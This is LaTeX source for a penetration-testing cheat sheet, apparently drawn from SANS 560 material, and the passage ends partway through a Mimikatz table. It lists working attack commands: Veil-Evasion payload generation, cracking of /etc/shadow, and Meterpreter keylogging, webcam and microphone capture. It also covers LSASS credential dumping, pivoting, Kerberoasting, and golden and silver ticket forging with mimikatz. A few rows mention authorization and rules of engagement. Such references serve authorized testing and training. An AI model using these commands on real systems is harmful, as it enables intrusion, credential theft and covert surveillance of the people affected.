\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Most useful database commands}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
`db\_connect
{[}connect\_string{]}` & Connects to a database \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
`db\_disconnect` & Disconnects from the database \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
`db\_driver` & Selects the database type \tn
% Row Count 7 (+ 2)
% Row 4
\SetRowColor{LightBackground}
`db\_status` & Displays the status of the database \tn
% Row Count 9 (+ 2)
% Row 5
\SetRowColor{white}
`db\_export` & Exports database contents into a file, either xml (with hosts, ports, vulnerabilities, and more) or pwdump (with pilfered credentials) \tn
% Row Count 16 (+ 7)
% Row 6
\SetRowColor{LightBackground}
`hosts` & Get list of hosts discovered \tn
% Row Count 18 (+ 2)
% Row 7
\SetRowColor{white}
`vulns` & Get list of vulns that were found in scanned hosts \tn
% Row Count 21 (+ 3)
% Row 8
\SetRowColor{LightBackground}
`services` & Get list of services running in gained hosts \tn
% Row Count 24 (+ 3)
% Row 9
\SetRowColor{white}
`hosts -{}-add {[}host{]}` & manually add hosts \tn
% Row Count 25 (+ 1)
% Row 10
\SetRowColor{LightBackground}
`services -{}-add -p {[}port{]} -r {[}proto{]} -s {[}name{]} {[}hostl,host2,...{]}` & manually add services running in hosts \tn
% Row Count 29 (+ 4)
% Row 11
\SetRowColor{white}
`notes -{}-add -t {[}type{]} -n '{[}note\_text{]}' {[}hostl,host2,...{]}` & manually add notes to a host \tn
% Row Count 32 (+ 3)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MSFDB - Metasploit Database (cont)}} \tn
% Row 12
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{If you delete a host, any services and vulns corresponding to that host\_id will also disappear} \tn
% Row Count 2 (+ 2)
% Row 13
\SetRowColor{white}
`db\_nmap -{}-sT 10.10.10.10 -{}-packet—trace` & invoke Nmap directly from the msfconsole \tn
% Row Count 5 (+ 3)
% Row 14
\SetRowColor{LightBackground}
`db\_import {[}filename{]}` & import
data | automatically recognizes the file type, e.g.\ Nmap xml, Amap, Nexpose, Qualys, Nessus \tn
% Row Count 10 (+ 5)
% Row 15
\SetRowColor{white}
`hosts -S linux` & search for any hosts associated with Linux; -S works for other items (vulns) as well \tn
% Row Count 15 (+ 5)
% Row 16
\SetRowColor{LightBackground}
`hosts -S linux -R` & set result as the RHOSTS variable value \tn
% Row Count 17 (+ 2)
% Row 17
\SetRowColor{white}
`vulns -p 445` & Look for vulnerabilities based on port number \tn
% Row Count 20 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Veil-Evasion}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Start Veil-Evasion}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`cd /opt/Veil-Evasion || /usr/share/veil`} \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`./Veil-Evasion .py`} \tn
% Row Count 3 (+ 1)
% Row 3
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn
% Row Count 4 (+ 1)
% Row 4
\SetRowColor{LightBackground}
`list` & get a list of all the different payloads that the tool can generate \tn
% Row Count 8 (+ 4)
% Row 5
\SetRowColor{white}
`info \seqsplit{powershell/meterpreter/rev\_https`} & get more information about any of the payloads \tn
% Row Count 11 (+ 3)
% Row 6
\SetRowColor{LightBackground}
`clean` & Clean out any leftover cruft from previous use of Veil-Evasion. \tn
% Row Count 15 (+ 4)
% Row 7
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Generate payload}}} \tn
% Row Count 16 (+ 1)
% Row 8
\SetRowColor{LightBackground}
`use info \seqsplit{powershell/meterpreter/rev\_https`} & select the payload you want to generate \tn
% Row Count 19 (+ 3)
% Row 9
\SetRowColor{white}
`options` & list options for the current item \tn
% Row Count 21 (+ 2)
% Row 10
\SetRowColor{LightBackground}
`generate` & create the payload file \tn
% Row Count 23 (+ 2)
% Row 11
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Generated files}}} \tn
% Row Count 24 (+ 1)
% Row 12
\SetRowColor{LightBackground}
`.bat` & This is the payload itself \tn
% Row Count 26 (+ 2)
% Row 13
\SetRowColor{white}
`.rc` & This is the Metasploit configuration file (also known as a handler file) for a multi/handler waiting for a connection from our payload. \tn
% Row Count 33 (+ 7)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Veil-Evasion (cont)}} \tn
% Row 14
\SetRowColor{LightBackground}
`exit` & exit Veil-Evasion \tn
% Row Count 1 (+ 1)
% Row 15
\SetRowColor{white}
\seqsplit{`/usr/share/veil-output/source`} & Veil-Evasion output directory \tn
% Row Count 3 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.16 cm} x{5.84 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{traceroute}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Options}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
`-f {[}N{]}` & Set the initial TTL for the first packet \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
`-g {[}hostlist{]}` & Specify a loose source route (8 maximum hops) \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
`-I` & Use ICMP Echo Request instead of UDP \tn
% Row Count 7 (+ 2)
% Row 4
\SetRowColor{LightBackground}
`-T` & Use TCP SYN instead of UDP (very useful!), with default dest port 80 \tn
% Row Count 10 (+ 3)
% Row 5
\SetRowColor{white}
`-m {[}N{]}` & Set the maximum number of hops \tn
% Row Count 12 (+ 2)
% Row 6
\SetRowColor{LightBackground}
`-n` & Print numbers instead of names \tn
% Row Count 14 (+ 2)
% Row 7
\SetRowColor{white}
`-p {[}port{]}` & port \tn
% Row Count 16 (+ 2)
% Row 8
\SetRowColor{LightBackground}
& For UDP, set the base destination UDP port and increment \tn
% Row Count 18 (+ 2)
% Row 9
\SetRowColor{white}
& For TCP, set the fixed TCP destination port to use, defaulting to port 80 (no incrementing) \tn
% Row Count 22 (+ 4)
% Row 10
\SetRowColor{LightBackground}
`-w {[}N{]}` & Wait for N seconds before giving up and writing * (default is 5) \tn
% Row Count 25 (+ 3)
% Row 11
\SetRowColor{white}
`-4` & Force use of IPv4 (by default, chooses 4 or 6 based on dest addr) \tn
% Row Count 28 (+ 3)
% Row 12
\SetRowColor{LightBackground}
`-6` & Force use of IPv6 \tn
% Row Count 29 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{John the Ripper}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
john.pot file & cracked password store \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
john.rec file & stores john's current status \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
john -{}-restore & picks up where it left off based on the contents of the john.rec file \tn
% Row Count 9 (+ 4)
% Row 4
\SetRowColor{LightBackground}
john -{}-test & Check speed of system \tn
% Row Count 11 (+ 2)
% Row 5
\SetRowColor{white}
john hash.txt & run john against the hash.txt file \tn
% Row Count 13 (+ 2)
% Row 6
\SetRowColor{LightBackground}
`john -{}-show {[}password\_file{]}` & compare which passwords John has already cracked from a given password file against its john.pot file \tn
% Row Count 18 (+ 5)
% Row 7
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Cracking LANMAN Hashes}}} \tn
% Row Count 19 (+ 1)
% Row 8
\SetRowColor{LightBackground}
`john /tmp/sam.txt` & By default, John will focus on the LANMAN hashes.
\tn % Row Count 22 (+ 3) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Cracking Linux Passwords}}} \tn % Row Count 23 (+ 1) % Row 10 \SetRowColor{LightBackground} `cp /etc/passwd /tmp/passwd\_copy` & copy passwd file to your working directory \tn % Row Count 26 (+ 3) % Row 11 \SetRowColor{white} `cp /etc/shadow /tmp/shadow\_copy` & copy shadow file to your working directory (needs root; /tmp is world-readable, so prefer a directory only you can read and delete the copies afterwards) \tn % Row Count 29 (+ 3) % Row 12 \SetRowColor{LightBackground} `./unshadow passwd\_copy shadow\_copy \textgreater{} combined.txt` & Use the `unshadow` script to combine account info from /etc/passwd with password information from /etc/shadow \tn % Row Count 35 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{John the Ripper (cont)}} \tn % Row 13 \SetRowColor{LightBackground} john combined.txt & Run John against the combined file \tn % Row Count 2 (+ 2) % Row 14 \SetRowColor{white} cat \textasciitilde{}/.john/john.pot & Look at the results in the john.pot file \tn % Row Count 4 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{1.6 cm} x{6.4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{pw-inspector (Password Inspector)}} \tn % Row 0 \SetRowColor{LightBackground} -i & input file \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} -o & output file \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} -m {[}n{]} & minimum password length n (shorter words are removed) \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} -M {[}N{]} & Remove all words longer than N characters \tn % Row Count 6 (+ 2) % Row 4 \SetRowColor{LightBackground} -c {[}count{]} & how many of the password criteria below a given word must meet to be included in the list. \tn % Row Count 9 (+ 3) % Row 5 \SetRowColor{white} -l & The password must contain at least one lowercase character.
\tn % Row Count 11 (+ 2) % Row 6 \SetRowColor{LightBackground} -u & The password must contain at least one uppercase character. (To specify a mixed-case requirement, use -c 2 -l -u.) \tn % Row Count 15 (+ 4) % Row 7 \SetRowColor{white} -n & The password must contain at least one number \tn % Row Count 17 (+ 2) % Row 8 \SetRowColor{LightBackground} -p & The password must contain at least one printable character that is neither alphabetic nor numeric, which includes !@\#\$\%\textasciicircum{}\&*(). \tn % Row Count 21 (+ 4) % Row 9 \SetRowColor{white} -s & The password must include characters not included in the other lists (such as nonprintable ASCII characters) \tn % Row Count 25 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Basic commands}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `?
/ help` & Display a help menu \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} `exit / quit` & Quit the Meterpreter \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} `sysinfo` & Show host name, OS type and architecture \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} `shutdown / reboot` & Self-explanatory (disruptive: only with explicit authorization in the rules of engagement) \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} `reg` & read or write to the Registry \tn % Row Count 7 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{File System Commands}}} \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} `cd` & Navigate directory structure \tn % Row Count 10 (+ 2) % Row 8 \SetRowColor{LightBackground} `lcd` & Change local directories on attacker machine \tn % Row Count 13 (+ 3) % Row 9 \SetRowColor{white} `pwd / getwd` & Show the current working directory \tn % Row Count 15 (+ 2) % Row 10 \SetRowColor{LightBackground} `ls` & List the directory contents, even on Windows \tn % Row Count 18 (+ 3) % Row 11 \SetRowColor{white} `cat` & Display a file's contents \tn % Row Count 20 (+ 2) % Row 12 \SetRowColor{LightBackground} `download / upload` & Move a file from or to the target machine \tn % Row Count 22 (+ 2) % Row 13 \SetRowColor{white} `mkdir / rmdir` & Make or remove directories \tn % Row Count 24 (+ 2) % Row 14 \SetRowColor{LightBackground} `edit` & Edit a file using the default editor \tn % Row Count 26 (+ 2) % Row 15 \SetRowColor{white} {\bf{Process Commands}} & 560.3 Page 92 \tn % Row Count 27 (+ 1) % Row 16 \SetRowColor{LightBackground} `getpid` & Returns the process ID that Meterpreter is running in \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 17 \SetRowColor{LightBackground} `getuid` & Returns the user ID that the Meterpreter is running with \tn % Row Count 3 (+ 3) % Row 18 \SetRowColor{white} `ps || ps -S notepad.exe` &
Process list (`-S` filters by process name) \tn % Row Count 5 (+ 2) % Row 19 \SetRowColor{LightBackground} `kill` & Terminate a process \tn % Row Count 6 (+ 1) % Row 20 \SetRowColor{white} `execute -f cmd.exe -c -H` & Runs a given program channelized (-c) and hides the process window (-H) \tn % Row Count 10 (+ 4) % Row 21 \SetRowColor{LightBackground} `migrate {[}destination\_process\_ID{]}` & Jumps to a given destination process ID: \tn % Row Count 12 (+ 2) % Row 22 \SetRowColor{white} & *Target process must have the same or lesser privileges (migrating into a process owned by another user requires an elevated session with SeDebugPrivilege) \tn % Row Count 15 (+ 3) % Row 23 \SetRowColor{LightBackground} & *May be a more stable process \tn % Row Count 17 (+ 2) % Row 24 \SetRowColor{white} & *When inside the process, can access any files that it has a lock on \tn % Row Count 21 (+ 4) % Row 25 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Network Commands}}} \tn % Row Count 22 (+ 1) % Row 26 \SetRowColor{white} `ipconfig` & show network config \tn % Row Count 23 (+ 1) % Row 27 \SetRowColor{LightBackground} `route` & Displays routing table, adds/deletes routes \tn % Row Count 26 (+ 3) % Row 28 \SetRowColor{white} `portfwd add -l 1111 -p 22 -r Target2` & Forward local port 1111 (-l) through the session to port 22 (-p) on Target2 (-r); see SANS 560.3 Exploitation Page 67 for details \tn % Row Count 29 (+ 3) % Row 29 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{On-target Machine commands}}} \tn % Row Count 30 (+ 1) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 30 \SetRowColor{LightBackground} `screenshot -p {[}file.jpg{]}` & Capture the target's desktop and save it to file.jpg \tn % Row Count 2 (+ 2) % Row 31 \SetRowColor{white} `idletime` & Show how long the user at the console has been idle \tn % Row Count 5 (+ 3) % Row 32 \SetRowColor{LightBackground} `uictl {[}enable/disable{]} {[}keyboard/mouse{]}` & Turn on or off user input devices (very visible to the user; only if explicitly in scope) \tn % Row Count 8 (+ 3) % Row 33 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Webcam
and Mic Commands}}} \tn % Row Count 9 (+ 1) % Row 34 \SetRowColor{LightBackground} `webcam\_list` & Lists installed webcams \tn % Row Count 11 (+ 2) % Row 35 \SetRowColor{white} `webcam\_snap` & Snaps a single frame from the webcam as a JPEG: -Can specify JPEG image quality from 1 to 100, with a default of 50 \tn % Row Count 17 (+ 6) % Row 36 \SetRowColor{LightBackground} `record\_mic` & Records audio for N seconds (-d N) and stores it in a wav file in the Metasploit .msf4 directory by default \tn % Row Count 23 (+ 6) % Row 37 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Make sure you get written permission before activating either feature, and the same applies to the keystroke logger below: captured images, audio and keystrokes are personal data and must be handled and destroyed as agreed in the rules of engagement} \tn % Row Count 25 (+ 2) % Row 38 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Keystroke Logger}}} \tn % Row Count 26 (+ 1) % Row 39 \SetRowColor{white} `keyscan\_start` & poll every 30 milliseconds for keystrokes entered into the system (captures only the desktop session of the current process; migrate into the target user's process, e.g. explorer.exe, first) \tn % Row Count 30 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 40 \SetRowColor{LightBackground} `keyscan\_dump` & flushes the buffer (up to 1 Megabyte) of captured keystrokes to the attacker's Meterpreter screen \tn % Row Count 5 (+ 5) % Row 41 \SetRowColor{white} `keyscan\_stop` & tells the Meterpreter to stop gathering keystrokes \tn % Row Count 8 (+ 3) % Row 42 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Pivoting Using Metasploit's Route Command}}} \tn % Row Count 9 (+ 1) % Row 43 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`use {[}exploit1{]}`} \tn % Row Count 10 (+ 1) % Row 44 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set RHOST {[}victim1{]}`} \tn % Row Count 11 (+ 1) % Row 45 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set PAYLOAD \seqsplit{windows/meterpreter/reverse\_tcp`}} \tn % Row Count 12 (+ 1) % Row 46 \SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`exploit`} \tn % Row Count 13 (+ 1) % Row 47 \SetRowColor{white} `CTRL-Z` & background the session... {\bf{msf will display the Meterpreter session id (sid)}} \tn % Row Count 16 (+ 3) % Row 48 \SetRowColor{LightBackground} `route add {[}victim2\_subnet{]} {[}netmask{]} {[}Sid{]}` & direct any of msf's packets for a given target machine or subnet through that Meterpreter session (applies to Metasploit modules only, not to other tools on the attacking host) \tn % Row Count 21 (+ 5) % Row 49 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`use {[}exploit2{]}`} \tn % Row Count 22 (+ 1) % Row 50 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set RHOST {[}victim2{]}`} \tn % Row Count 23 (+ 1) % Row 51 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set PAYLOAD {[}payload2{]}`} \tn % Row Count 24 (+ 1) % Row 52 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`exploit`} \tn % Row Count 25 (+ 1) % Row 53 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Do not confuse the Metasploit (msf) route command with the Meterpreter route command. The latter is used to manage the routing tables on a target box that has been compromised using the Meterpreter payload. The msf route command is used to direct all traffic for a given target subnet from the attacker's Metasploit machine through a given Meterpreter session on a compromised victim machine to another potential victim.} \tn % Row Count 34 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 54 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Additional Modules}}} \tn % Row Count 1 (+ 1) % Row 55 \SetRowColor{white} `use {[}modulename{]}` & load additional Meterpreter extensions (`load {[}extension{]}` in current versions; `use` is the legacy alias) \tn % Row Count 3 (+ 2) % Row 56 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Others}}} \tn % Row Count 4 (+ 1) % Row 57 \SetRowColor{white} `run schtasksabuse -c "{[}command1{]}{[},command2{]}..."
-t {[}targetIP{]}` & script that automates Windows scheduled-task (schtasks) creation on the target \tn % Row Count 8 (+ 4) % Row 58 \SetRowColor{LightBackground} & Uses Meterpreter's process credentials (add -u and -p for other credentials) \tn % Row Count 12 (+ 4) % Row 59 \SetRowColor{white} load kiwi & Load the mimikatz Kiwi Meterpreter extension on the target machine \tn % Row Count 16 (+ 4) % Row 60 \SetRowColor{LightBackground} creds\_all & dump credentials from LSASS (requires a SYSTEM / high-integrity session, e.g. after `getsystem`) \tn % Row Count 17 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{5.92 cm} x{2.08 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{GPG}} \tn % Row 0 \SetRowColor{LightBackground} `gpg -d -o \textless{}OutputFileName\textgreater{} \textless{}EncryptedFileName\textgreater{}` & decrypt a file \tn % Row Count 2 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{OVER-PASS-THE-HASH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{1. Perform the AS-REQ (encrypting the timestamp with the account's NT hash, which is its RC4 key) to get a TGT. Using only the NT hash forces RC4 and stands out in domains that use AES; supply the AES keys as well when you have them.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{2. Perform a TGS-REQ to the KDC to get a service ticket (TGS)} \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{3. Use the TGS to impersonate the hash owner and access a service} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Golden Ticket ATTACK}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Requirements}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `• KDC LT key` & (e.g.
KRBTGT NTLM hash; obtaining it already requires Domain Admin / DCSync-level access, and the forged tickets stay valid until the KRBTGT password has been rotated twice) \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`• Domain admin account name`} \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`• Domain name`} \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`• Domain SID` (the account itself is identified by its RID via /id)} \tn % Row Count 6 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Commands}}} \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`.\textbackslash{}mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID \seqsplit{/krbtgt:KRBTGTPASSWORDHASH`}} \tn % Row Count 10 (+ 3) % Row 7 \SetRowColor{white} `.\textbackslash{}mimikatz kerberos::ptt file.txt` & inject (pass-the-ticket) a previously saved ticket file into the current session; the golden ticket itself is created by kerberos::golden (add /ticket:file to save it to disk instead of /ptt) \tn % Row Count 12 (+ 2) % Row 8 \SetRowColor{LightBackground} `kerberos::tgt` & Get current session ticket details \tn % Row Count 14 (+ 2) % Row 9 \SetRowColor{white} `kerberos::list /export` & Export the session's tickets to .kirbi files \tn % Row Count 16 (+ 2) % Row 10 \SetRowColor{LightBackground} `kerberos::ptt file.kirbi` & Load / pass the ticket \tn % Row Count 18 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Silver Ticket ATTACK}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Requirements}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `• /target ` & target server's FQDN.
\tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} `• /service ` & SPN (service class, e.g. cifs, http, ldap) \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} `• /rc4` & NTLM hash of the account running the service (computer account or user account); no KDC contact is needed, so the DC never sees the forged ticket \tn % Row Count 7 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Steps}}} \tn % Row Count 8 (+ 1) % Row 5 \SetRowColor{white} `whoami /user` & get the domain and SID (plain `whoami` prints only domain\textbackslash{}user) \tn % Row Count 9 (+ 1) % Row 6 \SetRowColor{LightBackground} \seqsplit{`invoke-Kerberoast.ps1`} & request service tickets for SPN accounts and extract the TGS-REP hashes of the service users for offline cracking \tn % Row Count 12 (+ 3) % Row 7 \SetRowColor{white} `Mimikatz "privilege::debug" \seqsplit{"sekurlsa::logonpasswords"} exit` & get the service password hash directly w/Mimikatz (needs local admin/SYSTEM on the server hosting the vulnerable service) \tn % Row Count 17 (+ 5) % Row 8 \SetRowColor{LightBackground} `hashcat \seqsplit{""\$krb5tgs\$6\$acct\$svc/HOST:port\$XXXX…XXX""} dicti.txt hashcat -m 13100 hash.txt dicti.txt` & Get the cleartext service password w/hashcat (if we didn't get the NTLM hash; mode 13100 is for RC4/etype 23 tickets) and then hash it to NTLM \tn % Row Count 22 (+ 5) % Row 9 \SetRowColor{white} `Import-Module DSInternals \$pwd = \seqsplit{ConvertTo-SecureString} 'P@\$\$w0rd' -AsPlainText -Force ConvertTo-NTHash \$pwd` & Hash the cleartext password to NTLM \tn % Row Count 28 (+ 6) % Row 10 \SetRowColor{LightBackground} `mimikatz "kerberos::golden /admin:ImAdmin /id:1106 \seqsplit{/domain:lab.adsecurity.org} /sid:S-1-5-21-XXXXX \seqsplit{/target:EXCHANGE.lab.local} /rc4:NTLMHash /service:ServiceSPN /ptt" exit` & Forge a TGS (silver ticket) and inject it to authenticate to the target service \tn % Row Count 37 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Silver Ticket ATTACK (cont)}} \tn % Row 11 \SetRowColor{LightBackground} `misc::cmd ; klist ; use a command to connect to that specific service for example: \seqsplit{Find-InterestingFile} -Path
\textbackslash{}\textbackslash{}FileServer1.domain.com\textbackslash{}S\$\textbackslash{}shares\textbackslash{} ` & Authenticate to the service with the injected TGS (e.g. from a mimikatz-spawned cmd) and verify with klist \tn % Row Count 8 (+ 8) % Row 12 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Trolling}}} \tn % Row Count 9 (+ 1) % Row 13 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Faking RIDs (the name in the forged ticket need not match the RID)} \tn % Row Count 10 (+ 1) % Row 14 \SetRowColor{white} 1106 is "Anakin" & /id:1159 \tn % Row Count 11 (+ 1) % Row 15 \SetRowColor{LightBackground} 1159 is "Vader" & /user:Anakin \tn % Row Count 12 (+ 1) % Row 16 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Result: User: Anakin | Real Context User: Vader} \tn % Row Count 13 (+ 1) % Row 17 \SetRowColor{LightBackground} `/groups:512,513,518,519 \{\{nl\}\}/id:9999 \{\{nl\}\}/user:yourmom` & lulz -- note that a username or RID that does not exist in AD is a standard forged-ticket detection indicator \tn % Row Count 16 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Mimikatz}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Command Reference for ticket attacks}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `/domain` & domain's FQDN \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} `/sid` & SID of the domain \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} `/user /admin` & username to 